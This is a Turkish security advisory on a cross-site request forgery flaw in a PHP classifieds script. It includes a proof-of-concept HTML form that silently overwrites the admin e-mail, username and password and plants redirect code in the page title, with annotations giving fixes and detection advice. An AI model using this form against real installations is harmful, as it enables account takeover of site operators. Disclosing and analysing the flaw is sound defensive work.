< ------------------- header data start ------------------- >

#############################################################

# Application Name : PHP Classifieds Script

# Vulnerability Type : XSRF (cross-site request forgery, CSRF)

# Infection : Admin şifresi değiştirilebilir ..! Yönlendirme kodu konabilir. (English: the admin password can be changed, and redirect code can be inserted.)

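# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir ! (English: a session key / session token must be added to the form; the server has to verify it on every submission of the settings form for the fix to be effective.)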

# Demo : http://www.phpclassifiedsscript.com/demo/admin/settings/index.php

# author : CWCaspeR ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

<!--
  Proof-of-concept form from the advisory (CSRF against the admin settings page).
  It is an ordinary HTML form, hosted on a third-party page, that POSTs to
  admin/settings/index.php of the target installation; "hedefsite.com" and
  "scriptyolu" are placeholders for the target host and install path.
  Every field is hidden and no anti-CSRF token field is included. The advisory
  reports that the endpoint accepts the request anyway; the server-side handler
  is not shown on this page, so that rests on the author's report.

  NOTE(review): attribute values are delimited with typographic quotes rather
  than ASCII quotes, most likely a publishing artifact; the markup is kept
  exactly as posted.

  Defensive reading: the handler should reject any POST that lacks a valid,
  unpredictable, session-bound token, and should ask for the current password
  before changing credentials. A SameSite attribute on the session cookie and
  an Origin/Referer check add defence in depth. For detection, review web logs
  for POSTs to this path whose Origin or Referer points at a foreign site.
-->
<form action=’http://hedefsite.com/scriptyolu/admin/settings/index.php’ method=’post’>
<!--
  Account fields: per the advisory these overwrite the admin e-mail, username
  and password. The e-mail value appears to have been masked by the hosting
  site's address protection. "validate" and "message" are not standard HTML
  attributes; together with "required" they look copied from the application's
  own settings form (presumably). They are client-side hints only and cannot
  stop a forged request.
-->
<input type=’hidden’ name=’Email’ value=’[email protected]’ required=’yes’ validate=’email’ message=’Enter Email.’>
<input type=’hidden’ name=’username’ value=’username’ required=’yes’ validate=’text’ message=’Enter username.’>
<input type=’hidden’ name=’password’ value=’passWORD’ required=’yes’ validate=’text’ message=’Enter password.’>
<input type=’hidden’ name=’Domain’ value=’http://domainadi.com’ required=’yes’ validate=’text’ message=’Enter Domain Name.’>
<input type=’hidden’ name=’GoogleMapKey’ value=’’>
<!--
  PageTitle carries a placeholder (Turkish, roughly "put redirect code here if
  you want"). The advisory states that redirect code can be placed in this
  setting, which would also mean the stored title is rendered without output
  encoding (TODO confirm against the application). Validate the value on input
  and encode it on output.
-->
<input type=’hidden’ name=’PageTitle’ value=’ISTERSENYONLENDIRMEKODUKOY’ required=’yes’ validate=’text’ message=’Enter Page Title.’>
<input type=’hidden’ name=’Banner’ value=’’ required=’yes’ validate=’text’ message=’Enter Banner Image.’>
<input value=’5’ type=’hidden’ name=’NumAds’ required=’yes’ validate=’int’ message=’Enter Number of Ads Shown.’>
<input type=’hidden’ name=’DefaultCountry’ required=’yes’ value=’USA’ validate=’text’ message=’Enter Zip/Postal code Search: Default Country.’>
<input type=’hidden’ name=’YahooWeatherRSS’ required=’yes’ validate=’text’ message=’Enter Yahoo Default Weather RSS URL.’ value=’’>
<!-- The submit button is the only visible control; its label is a placeholder ("BUTONADI" = "button name"). -->
<input type=’submit’ value=’BUTONADI’>
</form>

< -- bug code end of -- >